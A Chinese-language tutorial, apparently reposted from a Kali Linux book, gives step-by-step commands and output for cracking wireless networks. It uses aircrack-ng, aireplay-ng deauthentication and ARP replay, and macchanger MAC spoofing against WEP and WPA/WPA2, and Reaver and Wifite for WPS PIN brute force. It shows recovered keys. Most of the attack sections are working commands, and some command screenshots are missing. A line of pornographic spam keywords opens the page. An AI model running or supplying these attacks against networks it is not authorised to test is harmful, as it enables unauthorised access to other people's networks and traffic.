国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

Kali-linux使用Aircrack-ng工具破解無線網(wǎng)絡(luò)

這篇具有很好參考價(jià)值的文章主要介紹了Kali-linux使用Aircrack-ng工具破解無線網(wǎng)絡(luò)。希望對大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問。

Aircrack-ng是一款基于破解無線802.11協(xié)議的WEP及WPA-PSK加密的工具。該工具主要用了兩種攻擊方式進(jìn)行WEP破解。一種是FMS攻擊,該攻擊方式是以發(fā)現(xiàn)該WEP漏洞的研究人員名字(Scott Fluhrer、Itsik Mantin及Adi Shamir)所命名;另一種是Korek攻擊,該攻擊方式是通過統(tǒng)計(jì)進(jìn)行攻擊的,并且該攻擊的效率要遠(yuǎn)高于FMS攻擊。本節(jié)將介紹使用Aircrack-ng破解無線網(wǎng)絡(luò)。

9.2.1 破解WEP加密的無線網(wǎng)絡(luò)

Wired Equivalent Privacy或WEP(有線等效加密)協(xié)議是對在兩臺設(shè)備間無線傳輸?shù)臄?shù)據(jù)進(jìn)行加密的方式,用以防止非法用戶竊聽或侵入無線網(wǎng)絡(luò)。不過密碼分析學(xué)家已經(jīng)找出WEP好幾個(gè)弱點(diǎn),因此在2003年被Wi-Fi Protected Access(WPA)淘汰,又在2004年由完整的IEEE 802.11i標(biāo)準(zhǔn)(又稱為WPA2)所取代。本小節(jié)將介紹破解WEP加密的無線網(wǎng)絡(luò)。

使用Aircrack破解使用WEP加密的無線網(wǎng)絡(luò)。具體操作步驟如下所示。

(1)使用airmon-ng命令查看當(dāng)前系統(tǒng)中的無線網(wǎng)絡(luò)接口。執(zhí)行命令如下所示:

Kali-linux使用Aircrack-ng工具破解無線網(wǎng)絡(luò)

輸出的信息表示,當(dāng)前系統(tǒng)中存在一個(gè)無線網(wǎng)絡(luò)接口。從輸出結(jié)果的Interface列,可以看到當(dāng)前系統(tǒng)的無線接口為wlan0。

(2)修改wlan0接口的MAC地址。因?yàn)镸AC地址標(biāo)識主機(jī)所在的網(wǎng)絡(luò),修改主機(jī)的MAC地址可以隱藏真實(shí)的MAC地址。在修改MAC地址之前,需要停止該接口。執(zhí)行命令如下所示:

Kali-linux使用Aircrack-ng工具破解無線網(wǎng)絡(luò)

或者:

root@kali:~# ifconfig wlan0 down

執(zhí)行以上命令后,wlan0接口則停止。此時(shí)就可以修改MAC地址了,執(zhí)行命令如下 所示:

root@kali:~# macchanger --mac 00:11:22:33:44:55 wlan0
Permanent MAC: 00:c1:40:76:05:6c (unknown)
Current   MAC: 00:c1:40:76:05:6c (unknown)
New       MAC: 00:11:22:33:44:55 (Cimsys Inc)

輸出的信息顯示了wlan0接口永久的MAC地址、當(dāng)前的MAC地址及新的MAC地址??梢钥吹絯lan1接口的MAC地址已經(jīng)被修改。

(3)重新啟動wlan0。執(zhí)行命令如下所示:

Kali-linux使用Aircrack-ng工具破解無線網(wǎng)絡(luò)

輸出的信息顯示了無線網(wǎng)卡wlan0的芯片及驅(qū)動類型。例如,當(dāng)前系統(tǒng)的無線網(wǎng)卡芯片為Ralink RT2870/3070;默認(rèn)驅(qū)動為rt2800usb,并顯示監(jiān)聽模式被啟用,映射網(wǎng)絡(luò)接口為mon0。

有時(shí)候使用airmon-ng start wlan0命令啟用無線網(wǎng)卡時(shí),可能會出現(xiàn)SIOCSIFFLAGS: Operation not possible due to RF-kill錯(cuò)誤。這是因?yàn)長inux下有一個(gè)軟件RF-kill,該軟件為了省電會將不使用的無線設(shè)備(如WIFI和Buletooth)自動關(guān)閉。當(dāng)用戶使用這些設(shè)備時(shí),RF-kill不會智能的自動打開,需要手動解鎖。用戶可以執(zhí)行rfkill list命令查看所有設(shè)備,如下所示:

root@kali:~# rfkill list
0: ideapad_wlan: Wireless LAN
Soft blocked: yes
Hard blocked: no
1: phy0: Wireless LAN
Soft blocked: yes
Hard blocked: no

該列表中前面的編號,表示的是設(shè)備的索引號。用戶可以通過指定索引號,停止或啟用某個(gè)設(shè)備。如啟用所有設(shè)備,執(zhí)行如下所示的命令:

root@kali:~# rfkill unblock all

執(zhí)行以上命令后,沒有任何信息輸出。以上命令表示,解除所有被關(guān)閉的設(shè)備。

(4)使用airodump命令定位附近所有可用的無線網(wǎng)絡(luò)。執(zhí)行命令如下所示:

Kali-linux使用Aircrack-ng工具破解無線網(wǎng)絡(luò)

以上輸出的信息顯示了附近所有可用的無線網(wǎng)絡(luò)。當(dāng)找到用戶想要攻擊的無線路由器時(shí),按下Ctrl+C鍵停止搜索。

從輸出的信息中看到有很多參數(shù)。詳細(xì)介紹如下所示。

  • BSSID:無線的IP地址。
  • PWR:網(wǎng)卡報(bào)告的信號水平。
  • Beacons:無線發(fā)出的通告編號。
  • Data:被捕獲到的數(shù)據(jù)分組的數(shù)量,包括廣播分組。

  • /s:過去10秒鐘內(nèi)每秒捕獲數(shù)據(jù)分組的數(shù)量。

  • CH:信道號(從Beacons中獲取)。
  • MB:無線所支持的最大速率。如果MB=11,它是802.11b;如果MB=22,它是802.11b+;如果更高就是802.11g。后面的點(diǎn)(高于54之后)表明支持短前導(dǎo)碼。
  • ENC:使用的加密算法體系。OPN表示無加密。WEP?表示W(wǎng)EP或者WPA/WPA2模式,WEP(沒有問號)表示靜態(tài)或動態(tài)WEP。如果出現(xiàn)TKIP或CCMP,那么就是WPA/WPA2。
  • CIPHER:檢測到的加密算法,是CCMP、WRAAP、TKIP、WEP和WEP104中的一個(gè)。典型的來說(不一定),TKIP與WPA結(jié)合使用,CCMP與WPA2結(jié)合使用。如果密鑰索引值大于0,顯示為WEP40。標(biāo)準(zhǔn)情況下,索引0-3是40bit,104bit應(yīng)該是0。
  • AUTH:使用的認(rèn)證協(xié)議。常用的有MGT(WPA/WPA2使用獨(dú)立的認(rèn)證服務(wù)器,平時(shí)我們常說的802.1x、radius和eap等)、SKA(WEP的共享密鑰)、PSK(WPA/WPA2的預(yù)共享密鑰)或者OPN(WEP開放式)。
  • ESSID:指所謂的SSID號。如果啟用隱藏的SSID的話,它可以為空。這種情況下,airodump-ng試圖從proberesponses和associationrequests中獲取SSID。
  • STATION:客戶端的MAC地址,包括連上的和想要搜索無線來連接的客戶端。如果客戶端沒有連接上,就在BSSID下顯示“notassociated”。
  • Rate:表示傳輸率。
  • Lost:在過去10秒鐘內(nèi)丟失的數(shù)據(jù)分組,基于序列號檢測。它意味著從客戶端來的數(shù)據(jù)丟包,每個(gè)非管理幀中都有一個(gè)序列號字段,把剛接收到的那個(gè)幀中的序列號和前一個(gè)幀中的序列號一減就能知道丟了幾個(gè)包。
  • Frames:客戶端發(fā)送的數(shù)據(jù)分組數(shù)量。
  • Probe:被客戶端查探的ESSID。如果客戶端正試圖連接一個(gè)無線,但是沒有連接上,那么就顯示在這里。

(5)使用airodump-ng捕獲指定BSSID的文件。執(zhí)行命令如下所示。

airodump-ng命令常用的選項(xiàng)如下所示。

  • -c:指定選擇的頻道。
  • -w:指定一個(gè)文件名,用于保存捕獲的數(shù)據(jù)。
  • -bssid:指定攻擊的BSSID。

下面將Bssid為14:E6:E4:AC:FB:20的無線路由器作為攻擊目標(biāo)。執(zhí)行命令如下所示:

Kali-linux使用Aircrack-ng工具破解無線網(wǎng)絡(luò)

從輸出的信息中可以看到ESSID為Test無線路由器的#Data一直在變化,表示有客戶端正與無線發(fā)生數(shù)據(jù)交換。以上命令執(zhí)行成功后,會生成一個(gè)名為wirelessattack-01.ivs的文件,而不是wirelessattack.ivs。這是因?yàn)閍irodump-ng工具為了方便后面破解的時(shí)候調(diào)用,所有對保存文件按順序編了號,于是就多了-01這樣的序號,以此類推。在進(jìn)行第二次攻擊時(shí),若使用同樣文件名wirelessattack保存的話,就會生成名為wirelessattack-02.ivs文件。

(6)打開一個(gè)新的終端窗口,運(yùn)行aireplay命令。aireplay命令的語法格式如下所示:

aireplay-ng -1 0 -a [BSSID] -h [our Chosen MAC address] -e [ESSID] [Interface]
aireplay-ng -dauth 1 -a [BSSID] -c [our Chosen MAC address] [Interface]

啟動aireplay,執(zhí)行命令如下所示:

root@kali:~# aireplay-ng -1 0 -a 14:E6:E4:AC:FB:20 -h 00:11:22:33:44:55 -e Test mon0
The interface MAC (00:C1:40:76:05:6C) doesn't match the specified MAC (-h).
  ifconfig mon0 hw ether 00:11:22:33:44:55
17:25:17 Waiting for beacon frame (BSSID: 14:E6:E4:AC:FB:20) on channel 1
17:25:17 Sending Authentication Request (Open System) [ACK]
17:25:17 Switching to shared key authentication
17:25:19 Sending Authentication Request (Shared Key) [ACK]
17:25:19 Switching to shared key authentication
17:25:21 Sending Authentication Request (Shared Key) [ACK]
17:25:21 Switching to shared key authentication
17:25:23 Sending Authentication Request (Shared Key) [ACK]
17:25:23 Switching to shared key authentication
17:25:25 Sending Authentication Request (Shared Key) [ACK]
17:25:25 Switching to shared key authentication
17:25:27 Sending Authentication Request (Shared Key) [ACK]
17:25:27 Switching to shared key authentication
17:25:29 Sending Authentication Request (Shared Key) [ACK]
17:25:29 Switching to shared key authentication

(7)使用aireplay發(fā)送一些流量給無線路由器,以至于能夠捕獲到數(shù)據(jù)。語法格式如下所示:

aireplay-ng 3 -b [BSSID] -h [Our chosen MAC address] [Interface]

執(zhí)行命令如下所示:

root@kali:~# aireplay-ng -3 -b 14:E6:E4:AC:FB:20 -h 00:11:22:33:44:55 mon0
The interface MAC (00:C1:40:76:05:6C) doesn't match the specified MAC (-h).
  ifconfig mon0 hw ether 00:11:22:33:44:55
17:26:54 Waiting for beacon frame (BSSID: 14:E6:E4:AC:FB:20) on channel 1
Saving ARP requests in replay_arp-0515-172654.cap
You should also start airodump-ng to capture replies.
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Read 1259 packets (got 1 ARP requests and 189 ACKs), sent 198 packets…(499 pps
Read 1547 packets (got 1 ARP requests and 235 ACKs), sent 248 packets…(499 pps
Read 1843 packets (got 1 ARP requests and 285 ACKs), sent 298 packets…(499 pps
Read 2150 packets (got 1 ARP requests and 333 ACKs), sent 348 packets…(499 pps
Read 2446 packets (got 1 ARP requests and 381 ACKs), sent 398 packets…(499 pps
Read 2753 packets (got 1 ARP requests and 430 ACKs), sent 449 packets…(500 pps
Read 3058 packets (got 1 ARP requests and 476 ACKs), sent 499 packets…(500 pps
Read 3367 packets (got 1 ARP requests and 525 ACKs), sent 548 packets…(499 pps
Read 3687 packets (got 1 ARP requests and 576 ACKs), sent 598 packets…(499 pps
Read 4001 packets (got 1 ARP requests and 626 ACKs), sent 649 packets…(500 pps
Read 4312 packets (got 1 ARP requests and 674 ACKs), sent 699 packets…(500 pps
Read 4622 packets (got 1 ARP requests and 719 ACKs), sent 749 packets…(500 pps
Read 4929 packets (got 1 ARP requests and 768 ACKs), sent 798 packets…(499 pps
Read 5239 packets (got 1 ARP requests and 817 ACKs), sent 848 packets…(499 pps

輸出的信息就是使用ARP Requests的方式來讀取ARP請求報(bào)文的過程,此時(shí)回到airodump-ng界面查看,可以看到Test的Frames欄的數(shù)字在飛速的遞增。在抓取的無線數(shù)據(jù)報(bào)文達(dá)到了一定數(shù)量后,一般都是指IVsX值達(dá)到2萬以上時(shí),就可以開始破解,若不能成功就等待數(shù)據(jù)包文繼續(xù)抓取,然后多嘗試幾次。

(8)使用Aircrack破解密碼。執(zhí)行命令如下所示:

Kali-linux使用Aircrack-ng工具破解無線網(wǎng)絡(luò)

從輸出的結(jié)果中可以看到KEY FOUND,表示密碼已經(jīng)找到,為abcde。

9.2.2 破解WPA/WPA2無線網(wǎng)絡(luò)

WPA全名為Wi-Fi Protected Access,有WPA和WPA2兩個(gè)標(biāo)準(zhǔn)。它是一種保護(hù)無線電腦網(wǎng)絡(luò)安全的協(xié)議。對于啟用WPA/WPA2加密的無線網(wǎng)絡(luò),其攻擊和破解步驟及攻擊是完全一樣的。不同的是,在使用airodump-ng進(jìn)行無線探測的界面上,會提示為WPA CCMP PSK。當(dāng)使用aireplay-ng進(jìn)行攻擊后,同樣獲取到WPA握手?jǐn)?shù)據(jù)包及提示;在破解時(shí)需要提供一個(gè)密碼字典。下面將介紹破解WPA/WPA2無線網(wǎng)絡(luò)的方法。

使用aircrack-ng破解WPA/WPA2無線網(wǎng)絡(luò)的具體操作步驟如下所示。

(1)查看無線網(wǎng)絡(luò)接口。執(zhí)行命令如下所示:

Kali-linux使用Aircrack-ng工具破解無線網(wǎng)絡(luò)

(2)停止無線網(wǎng)絡(luò)接口。執(zhí)行命令如下所示:

Kali-linux使用Aircrack-ng工具破解無線網(wǎng)絡(luò)

(3)修改無線網(wǎng)卡MAC地址。執(zhí)行命令如下所示:

root@kali:~# macchanger --mac 00:11:22:33:44:55 wlan0
Permanent MAC: 00:c1:40:76:05:6c (unknown)
Current   MAC: 00:c1:40:76:05:6c (unknown)
New       MAC: 00:11:22:33:44:55 (Cimsys Inc)

(4)啟用無線網(wǎng)絡(luò)接口。執(zhí)行命令如下所示:

Kali-linux使用Aircrack-ng工具破解無線網(wǎng)絡(luò)

(5)捕獲數(shù)據(jù)包。執(zhí)行命令如下所示:

Kali-linux使用Aircrack-ng工具破解無線網(wǎng)絡(luò)

(6)對無線路由器Test進(jìn)行Deauth攻擊。執(zhí)行命令如下所示:

root@kali:~# aireplay-ng --deauth 1 -a 14:E6:E4:AC:FB:20 -c 00:11:22:33: 44:55 mon0
17:50:27 Waiting for beacon frame (BSSID: 14:E6:E4:AC:FB:20) on channel 1
17:50:30 Sending 64 directed DeAuth. STMAC: [00:11:22:33:44:55] [12|59 ACKs]

(7)破解密碼。執(zhí)行命令如下所示:

Kali-linux使用Aircrack-ng工具破解無線網(wǎng)絡(luò)

從輸出的信息中可以看到無線路由器的密碼已經(jīng)成功破解。在KEY FOUND提示的右側(cè)可以看到密碼已被破解出,為daxueba,破解速度約為500.88 k/s。

9.2.3 攻擊WPS(Wi-Fi Proteced Setup)

WPS是由Wi-Fi聯(lián)盟所推出的全新Wi-Fi安全防護(hù)設(shè)定標(biāo)準(zhǔn)。該標(biāo)準(zhǔn)主要是為了解決無線網(wǎng)絡(luò)加密認(rèn)證設(shè)定的步驟過于繁雜的弊病。因?yàn)橥ǔS脩敉鶗驗(yàn)樵O(shè)置步驟太麻煩,以至于不做任何加密安全設(shè)定,從而引起許多安全上的問題。所以很多人使用WPS設(shè)置無線設(shè)備,可以通過個(gè)人識別碼(PIN)或按鈕(PBC)取代輸入一個(gè)很長的密碼短語。當(dāng)開啟該功能后,攻擊者就可以使用暴力攻擊的方法來攻擊WPS。本小節(jié)將介紹使用各種工具攻擊WPS。

現(xiàn)在大部分路由器上都支持WPS功能。以前路由器有專門的WPS設(shè)置,現(xiàn)在的路由器使用QSS功能取代了。這里以TP-LINK型號為例,介紹設(shè)置WPS功能,如圖9.15所示。如果使用WPS的PBC方式,只需要按下路由器上的QSS/RESET按鈕就可以了。

Kali-linux使用Aircrack-ng工具破解無線網(wǎng)絡(luò)

圖9.15 設(shè)置WPS

從該界面可以看到QSS功能已開啟,可以看到當(dāng)前的PIN碼是04588306。這里可以重新生成新的PIN碼,或者恢復(fù)初始PIN碼。

【實(shí)例9-1】使用Reaver破解WPS。具體操作步驟如下所示。

(1)插入無線網(wǎng)卡,使用ifconfig命令查看無線網(wǎng)卡是否已經(jīng)正確插入。執(zhí)行命令如下所示:

root@Kali:~# ifconfig
eth0  Link encap:Ethernet HWaddr 00:19:21:3f:c3:e5
      inet addr:192.168.5.4 Bcast:192.168.5.255 Mask:255.255.255.0
      inet6 addr: fe80::219:21ff:fe3f:c3e5/64 Scope:Link
      UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
      RX packets:10541 errors:0 dropped:0 overruns:0 frame:0
      TX packets:7160 errors:0 dropped:0 overruns:0 carrier:0
      collisions:0 txqueuelen:1000
      RX bytes:4205470 (4.0 MiB) TX bytes:600691 (586.6 KiB)
lo    Link encap:Local Loopback
      inet addr:127.0.0.1 Mask:255.0.0.0
      inet6 addr: ::1/128 Scope:Host
      UP LOOPBACK RUNNING MTU:65536 Metric:1
      RX packets:296 errors:0 dropped:0 overruns:0 frame:0
      TX packets:296 errors:0 dropped:0 overruns:0 carrier:0
      collisions:0 txqueuelen:0
      RX bytes:17760 (17.3 KiB) TX bytes:17760 (17.3 KiB)

從輸出的信息中可以看到,只有一個(gè)以太網(wǎng)接口eth0。這是因?yàn)闊o線網(wǎng)卡可能沒有啟動,首先來啟動該無線網(wǎng)卡。執(zhí)行命令如下所示:

root@Kali:~# ifconfig wlan0 up

執(zhí)行以上命令后,沒有任何信息輸出。此時(shí)再次執(zhí)行ifconfig命令,查看無線網(wǎng)絡(luò)是否已啟動,如下所示:

root@Kali:~# ifconfig
......
wlan0  Link encap:Ethernet HWaddr 08:10:76:49:c3:cd
       UP BROADCAST MULTICAST MTU:1500 Metric:1
       RX packets:0 errors:0 dropped:0 overruns:0 frame:0
       TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
       collisions:0 txqueuelen:1000
       RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

看到以上輸出信息,則表示無線網(wǎng)卡已成功啟動,其網(wǎng)絡(luò)接口為wlan0。

(2)啟動無線網(wǎng)卡為監(jiān)聽模式。執(zhí)行命令如下所示:

Kali-linux使用Aircrack-ng工具破解無線網(wǎng)絡(luò)

從輸出的信息中,可以看到monitor mode enabled on mon0,表示無線網(wǎng)卡已啟動監(jiān)聽模式。在以上信息中,還可以看到無線網(wǎng)卡的芯片級驅(qū)動類型。其中,該網(wǎng)卡的芯片為Ralink,默認(rèn)驅(qū)動為rt2800usb。

注意:執(zhí)行以上命令啟動監(jiān)聽模式,一定要確定正確識別無線網(wǎng)卡的芯片和驅(qū)動。否則,該無線網(wǎng)卡可能導(dǎo)致攻擊失敗。

(3)攻擊WPS。執(zhí)行命令如下所示:

root@kali:~# reaver -i mon0 -b 14:E6:E4:AC:FB:20 -vv
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@ tacnetsol.com>
[+] Waiting for beacon from 14:E6:E4:AC:FB:20
[+] Switching mon0 to channel 1
[+] Switching mon0 to channel 2
[+] Switching mon0 to channel 3
[+] Switching mon0 to channel 11
[+] Switching mon0 to channel 4
[+] Switching mon0 to channel 5
[+] Switching mon0 to channel 6
[+] Switching mon0 to channel 7
[+] Associated with 8C:21:0A:44:09:F8 (ESSID: yztxty)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
......

從以上輸出信息中,可以看到正在等待連接到14:E6:E4:AC:FB:20無線路由器的信號。并且通過發(fā)送PIN信息,獲取密碼。

如果沒有路由器沒有開啟WPS的話,將會出現(xiàn)如下所示的信息:

[!] WARNING: Failed to associate with 14:E6:E4:AC:FB:20 (ESSID: XXXX)

Fern WiFi Cracker是一個(gè)非常不錯(cuò)的工具,用來測試無線網(wǎng)絡(luò)安全。后面將會介紹使用該工具,攻擊Wi-Fi網(wǎng)絡(luò)。這里首先介紹使用Fern WiFi Cracker工具來攻擊WPS。

【實(shí)例9-2】使用Wifite攻擊WPS。具體操作步驟如下所示。

(1)啟動Wifite工具,并指定使用common.txt密碼字典。在命令行終端執(zhí)行如下所示的命令:

root@kali:~# wifite -dict common.txt

執(zhí)行以上命令后,將顯示如下所示的信息:

Kali-linux使用Aircrack-ng工具破解無線網(wǎng)絡(luò)

以上信息顯示了WiFite工具的版本信息,支持平臺,并且開始掃描無線網(wǎng)絡(luò)。當(dāng)掃描到想要破解的無線網(wǎng)絡(luò)時(shí),按下CTRL+C組合鍵停止掃描。

(2)停止掃描無線網(wǎng)絡(luò),將顯示如下所示的信息:

Kali-linux使用Aircrack-ng工具破解無線網(wǎng)絡(luò)

從以上輸出信息中,可以看到掃描到五個(gè)無線接入點(diǎn)和三個(gè)客戶端。在輸出信息中,共顯示了7列。分別表示無線接入點(diǎn)編號、ESSID號、信道、加密方式、電功率、是否開啟wps和客戶端。如果僅有一個(gè)客戶端連接到無線接入點(diǎn),則CLIENT列顯示是client。如果有多個(gè)客戶端連接的話,則顯示是clients。

(3)此時(shí),選擇要攻擊的無線接入點(diǎn)。這里選擇第五個(gè)無線接入點(diǎn),輸入“1”。然后按下回車鍵將開始攻擊,顯示信息如下所示:

[+] select target numbers (1-5) separated by commas, or 'all': 1
[+] 1 target selected.
[0:00:00] initializing WPS PIN attack on yzty (EC:17:2F:46:70:BA)
 [0:11:00] WPS attack, 0/0 success/ttl,
 [!] unable to complete successful try in 660 seconds
 [+] skipping yzty
 [0:08:20] starting wpa handshake capture on "yzty"
 [0:08:11] new client found: 18:DC:56:F0:62:AF
 [0:08:09] listening for handshake…
 [0:00:11] handshake captured! saved as "hs/yzty_EC-17-2F-46-70-BA.cap"
 [+] 2 attacks completed:
 [+] 1/2 WPA attacks succeeded
         yzty (EC:17:2F:46:70:BA) handshake captured
         saved as hs/yzty_EC-17-2F-46-70-BA.cap
 [+] starting WPA cracker on 1 handshake
 [0:00:00] cracking yzty with aircrack-ng
 [+] cracked yzty (EC:17:2F:46:70:BA)!
 [+] key:  "huolong5"
[+] quitting

從輸出的信息中,可以看到破解出yzty無線設(shè)備的密碼為huolong5。文章來源地址http://www.zghlxwxcb.cn/news/detail-472672.html

到了這里,關(guān)于Kali-linux使用Aircrack-ng工具破解無線網(wǎng)絡(luò)的文章就介紹完了。如果您還想了解更多內(nèi)容,請?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • Kali-linux應(yīng)用更新和配置額外安全工具

    本節(jié)將介紹更新Kali的過程和配置一些額外的工具。這些工具在后面的章節(jié)中將是有用的。Kali軟件包不斷地更新和發(fā)布之間,用戶很快發(fā)現(xiàn)一套新的工具比最初在DVD ROM上下載的軟件包更有用。本節(jié)將通過更新安裝的方法,獲取Nessus的一個(gè)激活碼。最后安裝Squid。 應(yīng)用更新和配

    2024年02月06日
    瀏覽(24)
  • kali-linux 網(wǎng)絡(luò)漏洞掃描工具安裝-gvm(openvas)

    kali-linux 網(wǎng)絡(luò)漏洞掃描工具安裝-gvm(openvas)

    OpenVAS 是一個(gè)全功能的漏洞掃描器。它的功能包括非認(rèn)證測試、認(rèn)證測試、各種高水平和低水平的互聯(lián)網(wǎng)和工業(yè)協(xié)議、大規(guī)模掃描的性能調(diào)整和一個(gè)強(qiáng)大的內(nèi)部編程語言來實(shí)現(xiàn)任何類型的漏洞測試。 安裝環(huán)境:kali-linux docker桌面版 kali-linux docker桌面版部署_呂海洋的博客-CSDN博

    2024年02月08日
    瀏覽(26)
  • Kali-linux使用OpenVAS

    Kali-linux使用OpenVAS

    OpenVAS(開放式漏洞評估系統(tǒng))是一個(gè)客戶端/服務(wù)器架構(gòu),它常用來評估目標(biāo)主機(jī)上的漏洞。OpenVAS是Nessus項(xiàng)目的一個(gè)分支,它提供的產(chǎn)品是完全地免費(fèi)。OpenVAS默認(rèn)安裝在標(biāo)準(zhǔn)的Kali Linux上,本節(jié)將介紹配置及啟動OpenVAS。 5.2.1 配置OpenVAS OpenVAS默認(rèn)在Kali Linux中已經(jīng)安裝。如果要

    2024年02月08日
    瀏覽(21)
  • Kali-linux更新源方法

    Kali-linux更新源方法

    首先,kali-linux并不是為普通用戶準(zhǔn)備的,也不是一版普通的linux操作系統(tǒng),kali是優(yōu)秀而又豐富的安全、測試、取證工具集成環(huán)境,用于滿足網(wǎng)絡(luò)安全專業(yè)的使用需求,但要記住,kali是一款攻擊型工具,切忌用你的kali去做一些WF的事,編寫本篇博客的目的僅在于與網(wǎng)安、滲透

    2024年02月04日
    瀏覽(22)
  • ?Kali-linux攻擊路由器?

    ?Kali-linux攻擊路由器?

    前面介紹的各種工具,都是通過直接破解密碼,來連接到無線網(wǎng)絡(luò)。由于在一個(gè)無線網(wǎng)絡(luò)環(huán)境的所有設(shè)備中,路由器是最重要的設(shè)備之一。通常用戶為了保護(hù)路由器的安全,通常會設(shè)置一個(gè)比較復(fù)雜的密碼。甚至一些用戶可能會使用路由器的默認(rèn)用戶名和密碼。但是,路由器

    2024年02月10日
    瀏覽(38)
  • Kali-linux查看打開的端口

    Kali-linux查看打開的端口

    對一個(gè)大范圍的網(wǎng)絡(luò)或活躍的主機(jī)進(jìn)行滲透測試,必須要了解這些主機(jī)上所打開的端口號。在Kali Linux中默認(rèn)提供了Nmap和Zenmap兩個(gè)掃描端口工具。為了訪問目標(biāo)系統(tǒng)中打開的TCP和UDP端口,本節(jié)將介紹Nmap和Zenmap工具的使用。 4.4.1 TCP端口掃描工具Nmap 使用Nmap工具查看目標(biāo)主機(jī)19

    2024年02月10日
    瀏覽(23)
  • Kali-linux破解操作系統(tǒng)用戶密碼

    Kali-linux破解操作系統(tǒng)用戶密碼

    當(dāng)忘記操作系統(tǒng)的密碼或者攻擊某臺主機(jī)時(shí),需要知道該系統(tǒng)中某個(gè)用戶的用戶名和密碼。本節(jié)將分別介紹破解Windows和Linux用戶密碼。 8.6.1 破解Windows用戶密碼 Windows系統(tǒng)的用戶名和密碼保存在SAM(安全賬號管理器)文件中。在基于NT內(nèi)核的Windows系統(tǒng)中,包括Windows 2000及后續(xù)版

    2024年02月08日
    瀏覽(23)
  • Kali-linux破解LM Hashes密碼

    LM(LAN Manager)Hash是Windows操作系統(tǒng)最早使用的密碼哈希算法之一。在Windows 2000、XP、Vista和Windows 7中使用了更先進(jìn)的NTLMv2之前,這是唯一可用的版本。這些新的操作系統(tǒng)雖然可以支持使用LM哈希,但主要是為了提供向后兼容性。不過在Windows Vista和Windows 7中,該算法默認(rèn)是被禁用

    2024年02月06日
    瀏覽(21)
  • Kali-linux攻擊WordPress和其他應(yīng)用程序

    Kali-linux攻擊WordPress和其他應(yīng)用程序

    今天越來越多的企業(yè)利用SAAS(Software as a Service)工具應(yīng)用在他們的業(yè)務(wù)中。例如,他們經(jīng)常使用WordPress作為他們網(wǎng)站的內(nèi)容管理系統(tǒng),或者在局域網(wǎng)中使用Drupal框架。從這些應(yīng)用程序中找到漏洞,是非常有價(jià)值的。 為了收集用于測試的應(yīng)用程序,Turnkey Linux是一個(gè)非常好的資

    2024年02月13日
    瀏覽(19)
  • Kali-Linux-2023的下載鏈接和Kali的漢化教程(切換中文界面)【圖文詳細(xì)】

    Kali-Linux-2023的下載鏈接和Kali的漢化教程(切換中文界面)【圖文詳細(xì)】

    虛擬機(jī)下載鏈接(可復(fù)制到迅雷下載) https://kali.download/base-images/kali-2023.1/kali-linux-2023.1-vmware-amd64.7z 解壓縮 右擊選擇使用vmware打開,無需配置即可正常使用。 默認(rèn)的用戶名和密碼都是\\\"kali\\\" 打開終端,輸入命令 sudo dpkg-reconfigure locales 回車顯示如下界面: 回車: 按鍵盤上的方向

    2024年02月08日
    瀏覽(106)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包